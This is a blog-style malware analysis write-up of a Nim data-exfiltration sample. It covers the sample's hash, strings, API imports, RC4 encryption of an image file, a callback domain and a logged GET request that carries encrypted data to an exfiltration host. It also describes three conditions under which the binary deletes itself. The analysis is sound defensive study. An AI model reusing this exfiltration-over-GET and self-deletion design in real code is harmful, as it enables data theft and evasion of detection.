Data Exfiltration Malware: Unraveling the Mystery

Data Exfiltration Malware: Unraveling the Mystery

Static Analysis, Dynamic Analysis & Reverse Engineering of Data Exfiltration Malware

In the ever-evolving digital landscape, data exfiltration malware is the shadowy intruder that quietly siphons away sensitive information. With a keen eye for detail, we're about to unravel its secrets and expose its true nature.

File Hash & VT Analysis: Unveiling the Bad Boys

Our adventure kicks off with a file hash: 3aca2a08cf296f1845d6171958ef0ffd1c8bdfc3e48bdd34a605cb1f7468213e *unknown.exe.malz. With a 43/72 detection ratio in VirusTotal, it's clear that this binary is no ordinary piece of code. It's time to dig deeper.

43/72 detection ratio in VirusTotal

Architecture and Language:

This 64-bit binary written in Nim holds the key to our investigation. But what lies beneath the surface of this digital enigma? Let's dive into the world of this covert operator.

Basic Static Analysis: Strings, Secrets, and Path-etic Discoveries

A URL, cosmo.jpeg, a file path, and a mysterious name, Houdini, provide valuable clues

As we examine the code, strings and floss outputs reveal intriguing details. A URL, cosmo.jpeg, a file path, and a mysterious name, Houdini, provide valuable clues. It's evident that the binary is up to something, but we're just scratching the surface.

IAT & PE View:

Suspicious API calls, including GetCurrentProcessId, GetCurrentThreadId, TerminateProcess, and VirtualProtect, raise our suspicions. The plot thickens as we delve further into the digital labyrinth.

Basic Dynamic Analysis: The Plot Thickens

On initial detonation, there are no glaring visual indicators. The binary, known as "unknown.exe," mysteriously deletes itself. But when INetSim enters the scene, the plot takes an unexpected turn. While still lacking visual cues, the binary refuses to vanish, leaving us to wonder about its true purpose.

Network Signatures:

Our digital detective work uncovers intriguing network signatures.

intriguing network signatures

The binary makes a callback to the domain "update.ec12-4-109-278-3-ubuntu20-04.local." Additionally, a GET request to an encrypted URL, "http://cdn.altimiter.local/feed?post=B69A1CF6853645A440A0337BA0FB38291DE0B01A07FC129199658DDD4C1286BE45FEA8851D9BC6BC34220A6466D404C49A988BD6895AF291136076CCAFA9," adds to the complexity of our investigation.

update.ec12-4-109-278-3-ubuntu20-04.local

When I edited the /etc/hosts file with initial callback hosts to my localhost I observed that I was getting a callback at port 80

callback hosts to my localhost I observed

Host Indicators: The Accomplices Revealed

The binary isn't just creating chaos; it's creating a "password.txt" file in the Public directory.

creating a "password.txt" file in the Public directory

Additionally, it's tinkering with "cosmo.jpeg," hinting at data exfiltration

it's tinkering with "cosmo.jpeg

Advanced Static Analysis: The Code Breaker's Dilemma

Our digital detective skills led us to the discovery of an encryption method using RC4. With a password/key file in hand, we unveil the binary's method to encrypt data from "cosmo.jpeg." The intricate dance of code encryption unfolds.

Our digital detective skills led us to the discovery of an encryption method using RC4

I also observed another interesting function houdini. Looks like this function is responsible for deleting the binary.

There are three conditions when the binary will be deleted

The first condition is if the initial callback domain is not available or the binary is not able to make contact with the initial callback domain it will be deleted.

The first condition is if the initial callback domain is not available or the binary is not able to make contact with the initial callback domain it will be deleted.

The second condition is during the exfiltration routine if the network is lost or exfiltration is stopped due to some reason the binary will be deleted.

exfiltration routine

And finally, when the exfiltration subroutine is complete the binary will be deleted.

exfiltration subroutine is complete

Summary:

  • If the binary contacts the initial callback domain successfully, exfiltration occurs.

  • After a successful check-in with this domain, the sample unpacks the passwrd.txt file into C:\Users\Public, opens a handle to cosmo.jpeg, base64 encodes the contents of the file, and begins the data encryption routine.

  • The first callback domain is http://update.ec12-4-109-278-3-ubuntu20-04.local, which is not present in the strings output.

  • Exfiltration is achieved with the http://cdn.altimiter.local domain.

  • Unknown.exe deletes itself under the following conditions:

    • If the executable is run and cannot make a successful connection to the initial callback URL (http://update.ec12-4-109-278-3-ubuntu20-04.local)

    • If the executable is interrupted in the middle of its exfiltration routine (i.e. if INetSim is shut off while the binary is exfiltrating data)

    • If the executable finishes its exfiltration routine

Conclusion:

Our journey through the world of data exfiltration malware has revealed an intricate web of covert operations. With a binary that erases itself under specific conditions, we're left with more questions than answers. In the realm of cybersecurity, remaining vigilant and inquisitive is essential to uncovering and thwarting such covert digital operations. Stay curious and stay safe, for the digital landscape is ever-evolving and filled with mysteries.

References